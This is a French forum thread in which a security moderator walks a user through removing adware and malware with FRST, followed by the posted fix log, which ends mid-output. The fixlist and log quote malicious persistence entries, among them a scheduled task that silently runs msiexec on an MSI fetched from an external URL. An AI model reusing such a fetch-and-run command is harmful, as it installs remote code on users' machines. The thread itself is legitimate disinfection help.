Virus: stratégie de groupe,paramètres gérés par votre entreprise [Résolu/Fermé]

Signaler
Messages postés
17
Date d'inscription
dimanche 19 février 2017
Statut
Membre
Dernière intervention
7 février 2018
-
Messages postés
17
Date d'inscription
dimanche 19 février 2017
Statut
Membre
Dernière intervention
7 février 2018
-
Bonjour,
Mon PC est équipé de Windows 10 famille. Un virus a tout d'abord désactivé Windows defender.
avec comme message "géré par la stratégie de groupe" .
J'ai réussi à le réactiver partiellement en mettant directement à jour le registre mais maintenant certains paramètres sont "gérés par votre entreprise".
D'autre part, je n'arrive plus à télécharger Mozilla Firefox ni Google chrome sans charger en même temps des virus , d'après l'antivirus Kaspersky.
Merci de m'éclairer ou de m'indiquer de possibles solutions pour que je redevienne maitre de mon ordinateur.
Cordialement

12 réponses

Messages postés
180060
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
22 septembre 2020
22 110
Salut


Suis le tutoriel FRST https://www.malekal.com/tutoriel-farbar-recovery-scan-tool-frst/
(et bien prendre le temps de lire afin d'appliquer correctement - tout y est expliqué).
Télécharge et lance le scan FRST, cela va générer trois rapports FRST :
  • FRST.txt
  • Shortcut.txt
  • Additionnal.txt


Envoie, comme expliqué, ces trois rapports sur le site http://pjjoint.malekal.com et en retour donne les trois liens pjjoint qui mènent à  ses rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.

--
Messages postés
17
Date d'inscription
dimanche 19 février 2017
Statut
Membre
Dernière intervention
7 février 2018

Messages postés
180060
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
22 septembre 2020
22 110
Salut,

Encore infecté.

Désinstalle :
MyWinLocker
Norton Online Backup



Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :


CloseProcesses:
CreateRestorePoint:
ShortcutWithArgument:
Task: {71319B15-DDC0-4464-8CD6-81320DEB1A1B} - System32\Tasks\Driver Booster Scheduler => C:\Program Files (x86)\IObit\Driver Booster\Scheduler.exe
Task: {C7A49936-2AE6-4401-9ED7-F85CB8831F66} - System32\Tasks\Driver Booster SkipUAC (kiosk) => C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe
C:\Users\kiosk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epf&s=h2dztrmbl10bu%2C563bf6eb-a0cc-4511-9597-901238400cb2%2C
ShortcutWithArgument: C:\Users\kiosk\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epf&s=h2dztrmbl10bu%2C563bf6eb-a0cc-4511-9597-901238400cb2%2C
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FullHD Editeur Vidéo LoiLoScope Télécharger.lnk -> C:\Program Files (x86)\LoiLo\LoiLoScope Download\WebShortcut.exe () -> hxxp://loilo.tv/product/20?partner_id=14
HKLM-x32\...\Run: [LManager] => [X]
HKLM-x32\...\Run: [startertv_fr_8] => [X]
HKLM\...\Providers\qlpmvjzl: C:\Program Files (x86)\Plcult Helper\local64spl.dll
ShellIconOverlayIdentifiers: [KzShlobj] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} => -> Pas de fichier
R2 NetUtils2016srv; C:\WINDOWS\SysWOW64\NetUtils2016.exe [470592 2017-02-13] ()
S2 KuaizipUpdateChecker; C:\Program Files\¿ìѹ\X86\kuaizipUpdateChecker.dll [X]
R2 KuaiZipDrive; C:\WINDOWS\system32\drivers\KuaiZipDrive.sys [92832 2017-02-13] (WinMount International Inc)
R1 NetUtils2016; C:\WINDOWS\system32\drivers\NetUtils2016.sys [909944 2017-02-13] () <==== ATTENTION
2017-02-13 17:49 - 2017-02-13 17:49 - 00000000 ____D C:\WINDOWS\System32\Tasks\AVAST Software
2017-02-13 16:49 - 2017-02-13 16:49 - 00003322 _____ C:\WINDOWS\System32\Tasks\{0B1CA18D-23AF-419A-A1FE-C97F67423924}
2017-02-13 16:06 - 2017-02-13 16:06 - 00000000 ____D C:\Users\kiosk\.android
2017-02-13 15:34 - 2017-02-13 15:34 - 00002052 _____ C:\WINDOWS\System32\Tasks\x7nC8N7ZuG
2017-02-13 15:33 - 2017-02-13 15:47 - 00000000 ____D C:\Users\kiosk\AppData\Local\WikiThemes
2017-02-13 15:32 - 2017-02-13 15:32 - 00003530 _____ C:\WINDOWS\System32\Tasks\KuaiZip_Update
2017-02-13 15:31 - 2017-02-13 18:14 - 00000228 _____ C:\WINDOWS\web.bat
2017-02-13 15:31 - 2017-02-13 15:31 - 00720033 _____ C:\WINDOWS\unins000.exe
Task: C:\WINDOWS\Tasks\System HealerPeriod.job => <==== ATTENTION
Task: C:\WINDOWS\Tasks\System HealerStartUp.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION
Task: {ACD09D8F-4F5F-4D64-9EC8-A342DD77BC2D} - System32\Tasks\System HealerStartUp => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION
Task: {B5E9E935-152D-4400-B7FC-3D3715F432F8} - System32\Tasks\SystemHealer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe <==== ATTENTION
Task: {D70E8630-7364-451B-9B14-9A5FE016220B} - System32\Tasks\KuaiZip_Update => C:\PROGRA~1\F85A~1\X86\Update.exe <==== ATTENTION
Task: {8F9877D7-881A-45E6-A697-FEF0F665317B} - System32\Tasks\{0B1CA18D-23AF-419A-A1FE-C97F67423924} => pcalua.exe -a "C:\Program Files (x86)\gJ6h9PUIUt\uninstall.exe" -d "C:\Program Files (x86)\gJ6h9PUIUt"
Task: {90868FA7-427E-4C4B-92C0-9FDBB9FD4EEC} - System32\Tasks\Drejach => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD5000LPVT-22G33T0_WD-WX51C425336253362&%3Bv=2017213 /q
Task: {77B7F960-D20D-43C5-A66E-715057D1CB28} - System32\Tasks\SMW_UpdateTask_Time_3638343833393932362d5b4a4a416c34232a2a6c555a => Wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 <==== ATTENTION
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\...\StartupApproved\Run: => "8ZZKLXNLI5"
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\...\StartupApproved\Run: => "CDC8HW0BPU"
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\...\StartupApproved\Run: => "5M02VND77I"
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\...\StartupApproved\Run: => "T1DMZZS8E8"
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\...\StartupApproved\Run: => "ZQCMZOXKW7"
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\...\StartupApproved\Run: => "PH6PVRD7QQ"
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\...\StartupApproved\Run: => "RHVW6AMN83"
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\...\StartupApproved\Run: => "IW4RJL4VX2"
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\...\StartupApproved\Run: => "6UHQUALR39"
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\...\StartupApproved\Run: => "TXMK444M0A"
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\...\StartupApproved\Run: => "TJTGEQXYH0"
2017-02-13 15:31 - 2017-02-13 15:31 - 00092832 _____ (WinMount International Inc) C:\WINDOWS\system32\Drivers\KuaiZipDrive.sys
2017-02-13 15:31 - 2017-02-13 15:31 - 00035870 _____ C:\WINDOWS\unins000.dat
2017-02-13 15:31 - 2017-02-13 15:31 - 00004404 _____ C:\WINDOWS\System32\Tasks\SMW_UpdateTask_Time_3638343833393932362d5b4a4a416c34232a2a6c555a
2017-02-13 15:31 - 2017-02-13 15:31 - 00000000 ____D C:\Users\kiosk\AppData\Roaming\Softlink
2017-02-13 15:31 - 2017-02-13 15:31 - 00000000 ____D C:\ProgramData\SearchModule
2017-02-13 15:31 - 2017-01-05 11:10 - 00000059 _____ C:\WINDOWS\window.bat
2017-02-13 15:30 - 2017-02-13 15:30 - 00000000 ____D C:\Program Files\Common Files\Noobzo
2017-02-13 15:28 - 2017-02-19 12:34 - 00625272 _____ C:\WINDOWS\system32\NetUtils2016.dll
2017-02-13 15:28 - 2017-02-15 07:40 - 00000000 ____D C:\Users\kiosk\AppData\Roaming\gplyra
2017-02-13 15:28 - 2017-02-13 15:28 - 00909944 _____ C:\WINDOWS\system32\Drivers\NetUtils2016.sys
2017-02-13 15:28 - 2017-02-13 15:28 - 00470592 _____ C:\WINDOWS\SysWOW64\NetUtils2016.exe
2017-02-13 15:28 - 2017-02-13 15:28 - 00326144 _____ C:\ProgramData\smp2.exe
2017-02-13 15:28 - 2017-02-13 15:28 - 00187904 _____ C:\WINDOWS\rsrcs.dll
2017-02-13 15:28 - 2017-02-13 15:28 - 00004240 _____ C:\WINDOWS\System32\Tasks\SMW_P
2017-02-13 15:28 - 2017-02-13 15:28 - 00000000 ____D C:\WINDOWS\SysWOW64\sstmp
2017-02-13 15:28 - 2017-02-13 15:28 - 00000000 ____D C:\WINDOWS\system32\sstmp
2017-02-13 15:04 - 2017-02-14 08:35 - 00000000 __SHD C:\Users\kiosk\AppData\Roaming\alFSVWJB
2017-02-13 14:56 - 2017-02-13 15:13 - 00000000 ____D C:\Users\kiosk\AppData\Local\AppTrailers
2017-02-13 14:54 - 2017-02-13 15:41 - 00000290 _____ C:\WINDOWS\Tasks\System HealerStartUp.job
2017-02-13 14:54 - 2017-02-13 14:54 - 00002914 _____ C:\WINDOWS\System32\Tasks\System HealerPeriod
2017-02-13 14:54 - 2017-02-13 14:54 - 00002620 _____ C:\WINDOWS\System32\Tasks\System HealerStartUp
2017-02-13 14:54 - 2017-02-13 14:54 - 00002402 _____ C:\WINDOWS\SysWOW64\findit.xml
2017-02-13 14:54 - 2017-02-13 14:54 - 00000000 ____D C:\ProgramData\Hotfreshs
2017-02-13 14:53 - 2017-02-13 18:15 - 00000000 ____D C:\ProgramData\Logic Handler
2017-02-13 14:53 - 2017-02-13 15:41 - 00000290 _____ C:\WINDOWS\Tasks\System HealerPeriod.job
2017-02-13 14:53 - 2017-02-13 14:53 - 07319040 _____ C:\Users\kiosk\AppData\Roaming\agent.dat
2017-02-13 14:53 - 2017-02-13 14:53 - 01907533 _____ C:\Users\kiosk\AppData\Roaming\Singlematstrong.tst
2017-02-13 14:53 - 2017-02-13 14:53 - 00126464 _____ C:\Users\kiosk\AppData\Roaming\noah.dat
2017-02-13 14:53 - 2017-02-13 14:53 - 00070752 _____ C:\Users\kiosk\AppData\Roaming\Config.xml
2017-02-13 14:53 - 2017-02-13 14:53 - 00018432 _____ C:\Users\kiosk\AppData\Roaming\Main.dat
2017-02-13 14:53 - 2017-02-13 14:53 - 00005568 _____ C:\Users\kiosk\AppData\Roaming\md.xml
2017-02-13 14:53 - 2017-02-13 14:53 - 00003682 _____ C:\WINDOWS\System32\Tasks\System Healer Task
2017-02-13 14:53 - 2017-02-13 14:53 - 00000000 ____D C:\ProgramData\1e0400bd-3dd5-1
2017-02-13 14:53 - 2017-02-13 14:53 - 00000000 ____D C:\ProgramData\1e0400bd-1935-0
2017-02-13 14:52 - 2017-02-13 18:15 - 00000000 ____D C:\ProgramData\NetworkPacketManitor
2017-02-13 14:52 - 2017-02-13 15:00 - 00000000 ____D C:\Users\kiosk\AppData\Roaming\System Healer
2017-02-13 14:52 - 2017-02-13 14:52 - 00003404 _____ C:\WINDOWS\System32\Tasks\SystemHealer Run Delay
2017-02-13 14:52 - 2017-02-13 14:52 - 00003334 _____ C:\WINDOWS\System32\Tasks\SystemHealer Monitor
2017-02-13 14:52 - 2017-02-13 14:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Healer
2017-02-13 14:51 - 2017-02-13 14:52 - 00016224 _____ C:\Users\kiosk\AppData\Roaming\InstallationConfiguration.xml
2017-02-13 14:51 - 2017-02-13 14:51 - 00140288 _____ C:\Users\kiosk\AppData\Roaming\Installer.dat
2017-02-13 14:51 - 2017-02-13 14:51 - 00000000 ____D C:\Users\kiosk\AppData\Local\Javoenthusery
2017-02-13 14:38 - 2017-02-13 15:41 - 00000000 ____D C:\Users\kiosk\AppData\Roaming\Reogtion
2017-02-13 14:38 - 2017-02-13 14:44 - 00000000 ____D C:\Users\kiosk\AppData\Local\Kiqupy
2017-02-13 14:38 - 2017-02-13 14:38 - 00006088 _____ C:\WINDOWS\System32\Tasks\Plcult Helper
2017-02-13 14:38 - 2017-02-13 14:38 - 00005122 _____ C:\WINDOWS\System32\Tasks\Drejach
2017-02-06 19:15 - 2017-02-06 19:16 - 00553072 _____ C:\Users\kiosk\2277a_Utu.epub
2017-02-06 18:49 - 2017-02-06 18:50 - 01126932 _____ C:\Users\kiosk\8134f_Dossier64.epub
2017-02-06 18:46 - 2017-02-06 18:47 - 00000000 ____D C:\Users\kiosk\Desktop\epub drm
2017-02-06 18:41 - 2017-02-06 18:43 - 00928888 _____ C:\Users\kiosk\ce45f_Dlivrance.epub
2017-02-06 18:31 - 2017-02-06 18:31 - 00003290 _____ C:\WINDOWS\System32\Tasks\{C853C886-D06C-4AA1-B042-D222E9EF4AAA}
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:


Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",

A gauche, place toi sur le Bureau,

Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparait, copie/colle le contenu ici dans un nouveau message.


Redémarre l'ordinateur.


2°)
Réinitialise/Répare les navigateurs WEB :

Veuillez appuyer sur une touche pour continuer la désinfection...
Messages postés
17
Date d'inscription
dimanche 19 février 2017
Statut
Membre
Dernière intervention
7 février 2018

Bonjour,
Voici le Fixlog.txt.
Je vais réparer les navigateurs maintenant.
Encore merci pour votre aide.

Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 19-02-2017
Exécuté par kiosk (20-02-2017 10:37:19) Run:1
Exécuté depuis C:\Users\kiosk\Desktop
Profils chargés: kiosk & Administrateur (Profils disponibles: kiosk & Administrateur)
Mode d'amorçage: Normal
==============================================

fixlist contenu:

CloseProcesses:
CreateRestorePoint:
ShortcutWithArgument:
Task: {71319B15-DDC0-4464-8CD6-81320DEB1A1B} - System32\Tasks\Driver Booster Scheduler => C:\Program Files (x86)\IObit\Driver Booster\Scheduler.exe
Task: {C7A49936-2AE6-4401-9ED7-F85CB8831F66} - System32\Tasks\Driver Booster SkipUAC (kiosk) => C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe
C:\Users\kiosk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epf&s=h2dztrmbl10bu%2C563bf6eb-a0cc-4511-9597-901238400cb2%2C
ShortcutWithArgument: C:\Users\kiosk\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epf&s=h2dztrmbl10bu%2C563bf6eb-a0cc-4511-9597-901238400cb2%2C
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FullHD Editeur Vidéo LoiLoScope Télécharger.lnk -> C:\Program Files (x86)\LoiLo\LoiLoScope Download\WebShortcut.exe () -> hxxp://loilo.tv/product/20?partner_id=14
HKLM-x32\...\Run: [LManager] => [X]
HKLM-x32\...\Run: [startertv_fr_8] => [X]
HKLM\...\Providers\qlpmvjzl: C:\Program Files (x86)\Plcult Helper\local64spl.dll
ShellIconOverlayIdentifiers: [KzShlobj] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} => -> Pas de fichier
R2 NetUtils2016srv; C:\WINDOWS\SysWOW64\NetUtils2016.exe [470592 2017-02-13] ()
S2 KuaizipUpdateChecker; C:\Program Files\¿ìѹ\X86\kuaizipUpdateChecker.dll [X]
R2 KuaiZipDrive; C:\WINDOWS\system32\drivers\KuaiZipDrive.sys [92832 2017-02-13] (WinMount International Inc)
R1 NetUtils2016; C:\WINDOWS\system32\drivers\NetUtils2016.sys [909944 2017-02-13] () <==== ATTENTION
2017-02-13 17:49 - 2017-02-13 17:49 - 00000000 ____D C:\WINDOWS\System32\Tasks\AVAST Software
2017-02-13 16:49 - 2017-02-13 16:49 - 00003322 _____ C:\WINDOWS\System32\Tasks\{0B1CA18D-23AF-419A-A1FE-C97F67423924}
2017-02-13 16:06 - 2017-02-13 16:06 - 00000000 ____D C:\Users\kiosk\.android
2017-02-13 15:34 - 2017-02-13 15:34 - 00002052 _____ C:\WINDOWS\System32\Tasks\x7nC8N7ZuG
2017-02-13 15:33 - 2017-02-13 15:47 - 00000000 ____D C:\Users\kiosk\AppData\Local\WikiThemes
2017-02-13 15:32 - 2017-02-13 15:32 - 00003530 _____ C:\WINDOWS\System32\Tasks\KuaiZip_Update
2017-02-13 15:31 - 2017-02-13 18:14 - 00000228 _____ C:\WINDOWS\web.bat
2017-02-13 15:31 - 2017-02-13 15:31 - 00720033 _____ C:\WINDOWS\unins000.exe
Task: C:\WINDOWS\Tasks\System HealerPeriod.job => <==== ATTENTION
Task: C:\WINDOWS\Tasks\System HealerStartUp.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION
Task: {ACD09D8F-4F5F-4D64-9EC8-A342DD77BC2D} - System32\Tasks\System HealerStartUp => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION
Task: {B5E9E935-152D-4400-B7FC-3D3715F432F8} - System32\Tasks\SystemHealer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe <==== ATTENTION
Task: {D70E8630-7364-451B-9B14-9A5FE016220B} - System32\Tasks\KuaiZip_Update => C:\PROGRA~1\F85A~1\X86\Update.exe <==== ATTENTION
Task: {8F9877D7-881A-45E6-A697-FEF0F665317B} - System32\Tasks\{0B1CA18D-23AF-419A-A1FE-C97F67423924} => pcalua.exe -a "C:\Program Files (x86)\gJ6h9PUIUt\uninstall.exe" -d "C:\Program Files (x86)\gJ6h9PUIUt"
Task: {90868FA7-427E-4C4B-92C0-9FDBB9FD4EEC} - System32\Tasks\Drejach => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD5000LPVT-22G33T0_WD-WX51C425336253362&amp%3Bv=2017213 /q
Task: {77B7F960-D20D-43C5-A66E-715057D1CB28} - System32\Tasks\SMW_UpdateTask_Time_3638343833393932362d5b4a4a416c34232a2a6c555a => Wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 <==== ATTENTION
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\...\StartupApproved\Run: => "8ZZKLXNLI5"
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\...\StartupApproved\Run: => "CDC8HW0BPU"
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\...\StartupApproved\Run: => "5M02VND77I"
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\...\StartupApproved\Run: => "T1DMZZS8E8"
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\...\StartupApproved\Run: => "ZQCMZOXKW7"
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\...\StartupApproved\Run: => "PH6PVRD7QQ"
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\...\StartupApproved\Run: => "RHVW6AMN83"
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\...\StartupApproved\Run: => "IW4RJL4VX2"
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\...\StartupApproved\Run: => "6UHQUALR39"
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\...\StartupApproved\Run: => "TXMK444M0A"
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\...\StartupApproved\Run: => "TJTGEQXYH0"
2017-02-13 15:31 - 2017-02-13 15:31 - 00092832 _____ (WinMount International Inc) C:\WINDOWS\system32\Drivers\KuaiZipDrive.sys
2017-02-13 15:31 - 2017-02-13 15:31 - 00035870 _____ C:\WINDOWS\unins000.dat
2017-02-13 15:31 - 2017-02-13 15:31 - 00004404 _____ C:\WINDOWS\System32\Tasks\SMW_UpdateTask_Time_3638343833393932362d5b4a4a416c34232a2a6c555a
2017-02-13 15:31 - 2017-02-13 15:31 - 00000000 ____D C:\Users\kiosk\AppData\Roaming\Softlink
2017-02-13 15:31 - 2017-02-13 15:31 - 00000000 ____D C:\ProgramData\SearchModule
2017-02-13 15:31 - 2017-01-05 11:10 - 00000059 _____ C:\WINDOWS\window.bat
2017-02-13 15:30 - 2017-02-13 15:30 - 00000000 ____D C:\Program Files\Common Files\Noobzo
2017-02-13 15:28 - 2017-02-19 12:34 - 00625272 _____ C:\WINDOWS\system32\NetUtils2016.dll
2017-02-13 15:28 - 2017-02-15 07:40 - 00000000 ____D C:\Users\kiosk\AppData\Roaming\gplyra
2017-02-13 15:28 - 2017-02-13 15:28 - 00909944 _____ C:\WINDOWS\system32\Drivers\NetUtils2016.sys
2017-02-13 15:28 - 2017-02-13 15:28 - 00470592 _____ C:\WINDOWS\SysWOW64\NetUtils2016.exe
2017-02-13 15:28 - 2017-02-13 15:28 - 00326144 _____ C:\ProgramData\smp2.exe
2017-02-13 15:28 - 2017-02-13 15:28 - 00187904 _____ C:\WINDOWS\rsrcs.dll
2017-02-13 15:28 - 2017-02-13 15:28 - 00004240 _____ C:\WINDOWS\System32\Tasks\SMW_P
2017-02-13 15:28 - 2017-02-13 15:28 - 00000000 ____D C:\WINDOWS\SysWOW64\sstmp
2017-02-13 15:28 - 2017-02-13 15:28 - 00000000 ____D C:\WINDOWS\system32\sstmp
2017-02-13 15:04 - 2017-02-14 08:35 - 00000000 __SHD C:\Users\kiosk\AppData\Roaming\alFSVWJB
2017-02-13 14:56 - 2017-02-13 15:13 - 00000000 ____D C:\Users\kiosk\AppData\Local\AppTrailers
2017-02-13 14:54 - 2017-02-13 15:41 - 00000290 _____ C:\WINDOWS\Tasks\System HealerStartUp.job
2017-02-13 14:54 - 2017-02-13 14:54 - 00002914 _____ C:\WINDOWS\System32\Tasks\System HealerPeriod
2017-02-13 14:54 - 2017-02-13 14:54 - 00002620 _____ C:\WINDOWS\System32\Tasks\System HealerStartUp
2017-02-13 14:54 - 2017-02-13 14:54 - 00002402 _____ C:\WINDOWS\SysWOW64\findit.xml
2017-02-13 14:54 - 2017-02-13 14:54 - 00000000 ____D C:\ProgramData\Hotfreshs
2017-02-13 14:53 - 2017-02-13 18:15 - 00000000 ____D C:\ProgramData\Logic Handler
2017-02-13 14:53 - 2017-02-13 15:41 - 00000290 _____ C:\WINDOWS\Tasks\System HealerPeriod.job
2017-02-13 14:53 - 2017-02-13 14:53 - 07319040 _____ C:\Users\kiosk\AppData\Roaming\agent.dat
2017-02-13 14:53 - 2017-02-13 14:53 - 01907533 _____ C:\Users\kiosk\AppData\Roaming\Singlematstrong.tst
2017-02-13 14:53 - 2017-02-13 14:53 - 00126464 _____ C:\Users\kiosk\AppData\Roaming\noah.dat
2017-02-13 14:53 - 2017-02-13 14:53 - 00070752 _____ C:\Users\kiosk\AppData\Roaming\Config.xml
2017-02-13 14:53 - 2017-02-13 14:53 - 00018432 _____ C:\Users\kiosk\AppData\Roaming\Main.dat
2017-02-13 14:53 - 2017-02-13 14:53 - 00005568 _____ C:\Users\kiosk\AppData\Roaming\md.xml
2017-02-13 14:53 - 2017-02-13 14:53 - 00003682 _____ C:\WINDOWS\System32\Tasks\System Healer Task
2017-02-13 14:53 - 2017-02-13 14:53 - 00000000 ____D C:\ProgramData\1e0400bd-3dd5-1
2017-02-13 14:53 - 2017-02-13 14:53 - 00000000 ____D C:\ProgramData\1e0400bd-1935-0
2017-02-13 14:52 - 2017-02-13 18:15 - 00000000 ____D C:\ProgramData\NetworkPacketManitor
2017-02-13 14:52 - 2017-02-13 15:00 - 00000000 ____D C:\Users\kiosk\AppData\Roaming\System Healer
2017-02-13 14:52 - 2017-02-13 14:52 - 00003404 _____ C:\WINDOWS\System32\Tasks\SystemHealer Run Delay
2017-02-13 14:52 - 2017-02-13 14:52 - 00003334 _____ C:\WINDOWS\System32\Tasks\SystemHealer Monitor
2017-02-13 14:52 - 2017-02-13 14:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Healer
2017-02-13 14:51 - 2017-02-13 14:52 - 00016224 _____ C:\Users\kiosk\AppData\Roaming\InstallationConfiguration.xml
2017-02-13 14:51 - 2017-02-13 14:51 - 00140288 _____ C:\Users\kiosk\AppData\Roaming\Installer.dat
2017-02-13 14:51 - 2017-02-13 14:51 - 00000000 ____D C:\Users\kiosk\AppData\Local\Javoenthusery
2017-02-13 14:40 - 2017-02-13 15:57 - 00000000 ____D C:\WINDOWS\system32\SSL
2017-02-13 14:38 - 2017-02-13 15:41 - 00000000 ____D C:\Users\kiosk\AppData\Roaming\Reogtion
2017-02-13 14:38 - 2017-02-13 14:44 - 00000000 ____D C:\Users\kiosk\AppData\Local\Kiqupy
2017-02-13 14:38 - 2017-02-13 14:38 - 00006088 _____ C:\WINDOWS\System32\Tasks\Plcult Helper
2017-02-13 14:38 - 2017-02-13 14:38 - 00005122 _____ C:\WINDOWS\System32\Tasks\Drejach
2017-02-06 19:15 - 2017-02-06 19:16 - 00553072 _____ C:\Users\kiosk\2277a_Utu.epub
2017-02-06 18:49 - 2017-02-06 18:50 - 01126932 _____ C:\Users\kiosk\8134f_Dossier64.epub
2017-02-06 18:46 - 2017-02-06 18:47 - 00000000 ____D C:\Users\kiosk\Desktop\epub drm
2017-02-06 18:41 - 2017-02-06 18:43 - 00928888 _____ C:\Users\kiosk\ce45f_Dlivrance.epub
2017-02-06 18:31 - 2017-02-06 18:31 - 00003290 _____ C:\WINDOWS\System32\Tasks\{C853C886-D06C-4AA1-B042-D222E9EF4AAA}
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:


Processus fermé avec succès.
Le Point de restauration a été créé avec succès.
ShortcutWithArgument: => non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{71319B15-DDC0-4464-8CD6-81320DEB1A1B} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{71319B15-DDC0-4464-8CD6-81320DEB1A1B} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Driver Booster Scheduler => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Driver Booster Scheduler => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C7A49936-2AE6-4401-9ED7-F85CB8831F66} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C7A49936-2AE6-4401-9ED7-F85CB8831F66} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Driver Booster SkipUAC (kiosk) => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Driver Booster SkipUAC (kiosk) => clé supprimé(es) avec succès
"C:\Users\kiosk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epf&s=h2dztrmbl10bu%2C563bf6eb-a0cc-4511-9597-901238400cb2%2C" => non trouvé(e).
C:\Users\kiosk\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk => Raccourci argument supprimé(es) avec succès.
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FullHD Editeur Vidéo LoiLoScope Télécharger.lnk => Raccourci argument supprimé(es) avec succès.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\LManager => valeur supprimé(es) avec succès
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\startertv_fr_8 => valeur supprimé(es) avec succès
HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\qlpmvjzl => clé supprimé(es) avec succès
HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\\order qlpmvjzl => supprimé(es) avec succès
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\KzShlobj => clé supprimé(es) avec succès
HKCR\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} => clé non trouvé(e).
HKLM\System\CurrentControlSet\Services\NetUtils2016srv => clé supprimé(es) avec succès
NetUtils2016srv => service supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\KuaizipUpdateChecker => clé supprimé(es) avec succès
KuaizipUpdateChecker => service supprimé(es) avec succès
KuaiZipDrive => Impossible d'arrêter le service.
